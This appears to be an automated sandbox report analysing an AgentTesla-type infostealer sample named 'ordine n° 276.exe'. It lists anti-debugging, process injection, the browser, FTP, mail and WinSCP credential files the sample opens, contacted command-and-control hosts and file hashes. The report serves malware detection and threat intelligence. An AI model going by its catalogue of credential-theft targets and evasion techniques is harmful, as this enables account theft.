Source: RegAsm.exe, 00000007.00000002.1031397639.00000000009B0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32USERPROFILE=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: RegAsm.exe, 00000007.00000002.1036867181.000000001FFB0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Code function: 0_2_02173174 LdrInitializeThunk,

0_2_02173174

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040377D mov ebx, dword ptr fs:[00000030h]	0_2_0040377D
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004038C1 mov ebx, dword ptr fs:[00000030h]	0_2_004038C1
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004039C7 mov ebx, dword ptr fs:[00000030h]	0_2_004039C7
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004037CB mov ebx, dword ptr fs:[00000030h]	0_2_004037CB

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: D00000

Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior

Source: RegAsm.exe, 00000007.00000002.1031900684.0000000001590000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000007.00000002.1031900684.0000000001590000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000007.00000002.1031900684.0000000001590000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000007.00000002.1031900684.0000000001590000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6412, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6412, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6412, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping2	System Information Discovery314	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Obfuscated Files or Information1	Credentials in Registry1	Query Registry1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	DLL Side-Loading1	Security Account Manager	Security Software Discovery621	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion341	LSA Secrets	Virtualization/Sandbox Evasion341	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ordine n#U00b0 276.exe	26%	Virustotal		Browse
ordine n#U00b0 276.exe	36%	ReversingLabs	Win32.Trojan.Mucc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
smtp.fil-net.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://5Z6zzpV4pHjt.com	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://crl.pki.goog/gsr1/gsr1.crl0;	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://crl.pki.goog/gtsr1/gtsr1.crl0W	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr1/gsr1.crt02	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
http://mGfDbY.com	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://r3.i.lencr.org/0%	0%	Avira URL Cloud	safe
http://pki.goog/repo/certs/gts1c3.der0	0%	Avira URL Cloud	safe
http://pki.goog/repo/certs/gtsr1.der04	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
smtp.fil-net.com	46.16.61.250	true	true	0%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	216.58.212.129	true	false		high
doc-10-9k-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5Z6zzpV4pHjt.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr1/gsr1.crl0;	RegAsm.exe, 00000007.00000003.976218379.0000000001036000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-10-9k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/uf4tta3o	RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	false		high
http://cps.letsencrypt.org0	RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://doc-10-9k-docs.googleusercontent.com/G	RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	false		high
http://crl.pki.goog/GTS1O1core.crl0	RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.o.lencr.org0	RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%GETMozilla/5.0	RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl.pki.goog/gtsr1/gtsr1.crl0W	RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr1/gsr1.crt02	RegAsm.exe, 00000007.00000003.976218379.0000000001036000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	RegAsm.exe, 00000007.00000002.1031709055.0000000000FEF000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0	RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-10-9k-docs.googleusercontent.com/	RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	false		high
https://api.ipify.org%	RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://mGfDbY.com	RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.i.lencr.org/0%	RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/repo/certs/gts1c3.der0	RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/repo/certs/gtsr1.der04	RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.58.212.129	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false
46.16.61.250	smtp.fil-net.com	Spain		197712	CDMONsistemescdmoncomES	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404980
Start date:	05.05.2021
Start time:	17:00:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ordine n#U00b0 276.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@8/2@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 3.5% (good quality ratio 1.7%) Quality average: 32.8% Quality standard deviation: 37%
HCA Information:	Successful, ratio: 96% Number of executed functions: 144 Number of non-executed functions: 9
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.113.196.254, 104.43.139.144, 13.107.3.254, 13.107.246.254, 168.61.161.212, 52.255.188.83, 20.50.102.62, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 142.250.185.78, 13.107.4.50, 93.184.220.29, 20.82.209.183 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, au.au-msedge.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, crl3.digicert.com, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:02:05	API Interceptor	1130x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
46.16.61.250	ordine n#U00b0 276.exe	Get hash	malicious	Browse
	a5FVSNazgr.exe	Get hash	malicious	Browse
	HdgnMEvcFK.exe	Get hash	malicious	Browse
	RTStyEQJpZ.exe	Get hash	malicious	Browse
	PAGO.xlsx	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse
	Zapytanie -20216470859302.exe	Get hash	malicious	Browse
	winlog.exe	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse
	Nakit Akisi Detaylariniz.exe	Get hash	malicious	Browse
	S67xSX1MNR.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
smtp.fil-net.com	Zapytanie -20216470859302.exe	Get hash	malicious	Browse	46.16.61.250
smtp.fil-net.com	Nakit Akisi Detaylariniz.exe	Get hash	malicious	Browse	46.16.61.250

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CDMONsistemescdmoncomES	ordine n#U00b0 276.exe	Get hash	malicious	Browse	46.16.61.250
	a5FVSNazgr.exe	Get hash	malicious	Browse	46.16.61.250
	HdgnMEvcFK.exe	Get hash	malicious	Browse	46.16.61.250
	RTStyEQJpZ.exe	Get hash	malicious	Browse	46.16.61.250
	PAGO.xlsx	Get hash	malicious	Browse	46.16.61.250
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	46.16.61.250
	Zapytanie -20216470859302.exe	Get hash	malicious	Browse	46.16.61.250
	njGJ1eW44wshoMr.exe	Get hash	malicious	Browse	46.16.62.134
	3nG9LW7Z21dxUoM.exe	Get hash	malicious	Browse	46.16.62.134
	keeFDE9dhCGNNez.exe	Get hash	malicious	Browse	46.16.62.134
	74tF1foMeQyUMCh.exe	Get hash	malicious	Browse	46.16.62.134
	qm7JU84PFgfqvgs.exe	Get hash	malicious	Browse	46.16.62.134
	winlog.exe	Get hash	malicious	Browse	46.16.61.250
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	46.16.61.250
	WbGKi8E5OE4eCFG.exe	Get hash	malicious	Browse	46.16.62.134
	r9SWnqQlK8PFPEp.exe	Get hash	malicious	Browse	46.16.62.134
	L9oOm9x3I7YZFcA.exe	Get hash	malicious	Browse	46.16.62.134
	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe	Get hash	malicious	Browse	134.0.10.35
	jKiL1mzTAVltJ30.exe	Get hash	malicious	Browse	46.16.62.134
	09xcuRN2HJmRRCm.exe	Get hash	malicious	Browse	46.16.62.134

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	tncGQWIL6H.exe	Get hash	malicious	Browse	216.58.212.129
	CT3nHWujrM.exe	Get hash	malicious	Browse	216.58.212.129
	build.exe	Get hash	malicious	Browse	216.58.212.129
	eDg92MgQgh.exe	Get hash	malicious	Browse	216.58.212.129
	c2de9c66_by_Libranalysis.exe	Get hash	malicious	Browse	216.58.212.129
	SecuriteInfo.com.Mal.Generic-S.21221.exe	Get hash	malicious	Browse	216.58.212.129
	SecuriteInfo.com.W32.AIDetect.malware2.12980.exe	Get hash	malicious	Browse	216.58.212.129
	proforma invoice No. 42037,pdf.exe	Get hash	malicious	Browse	216.58.212.129
	jt50apTCUS.docx	Get hash	malicious	Browse	216.58.212.129
	SecuriteInfo.com.Heur.32597.xls	Get hash	malicious	Browse	216.58.212.129
	SecuriteInfo.com.ArtemisTrojan.25081.exe	Get hash	malicious	Browse	216.58.212.129
	Update_new32.exe	Get hash	malicious	Browse	216.58.212.129
	PaymentAdvice - Copy.htm	Get hash	malicious	Browse	216.58.212.129
	INVOICE & STATEMENTS -COPY.htm	Get hash	malicious	Browse	216.58.212.129
	DGNTL04052021.2-8864.html	Get hash	malicious	Browse	216.58.212.129
	Proforma adjunta N#U00ba 42037,pdf.exe	Get hash	malicious	Browse	216.58.212.129
	Notes Received gcgaming.com.html	Get hash	malicious	Browse	216.58.212.129
	7D1E.exe	Get hash	malicious	Browse	216.58.212.129
	5.exe	Get hash	malicious	Browse	216.58.212.129
	ordine n#U00b0 276.exe	Get hash	malicious	Browse	216.58.212.129

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\1sxxov2t.dy0\Chrome\Default\Cookies Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	modified
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.764868199016906
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ordine n#U00b0 276.exe
File size:	98304
MD5:	10f03c95ba280cd5a82146269f89ca9d
SHA1:	c24232721d7aefe2c013b9642e0ab7db8007e48a
SHA256:	11f63d2fda1055ac66a71cb539c9d5ff66fd79f473e19171fd8f663e2c4979b9
SHA512:	4b537aec0eee96b506ac63fcbdffc4e1e2ac231ca8d5136cfe7a67e84ac5643424d7090ae88ddb3e809d94272fa15edb20ed70964076fbf05260dceabac5ab76
SSDEEP:	1536:kh70hrnoEdQNvX1/o3IAEmYY6qbtug0Oj1o/:kl0tnoO81/4OYZJGO5S
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L.....UQ.................P... ......\|........`....@................

File Icon


Icon Hash:	b074cecec891b2e4

Static PE Info

General
Entrypoint:	0x40157c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x51551DDA [Fri Mar 29 04:51:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	631ffe9ad0b821781f48149fabda62f6

Entrypoint Preview

Instruction
push 0040CC14h
call 00007FF0B45C6375h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
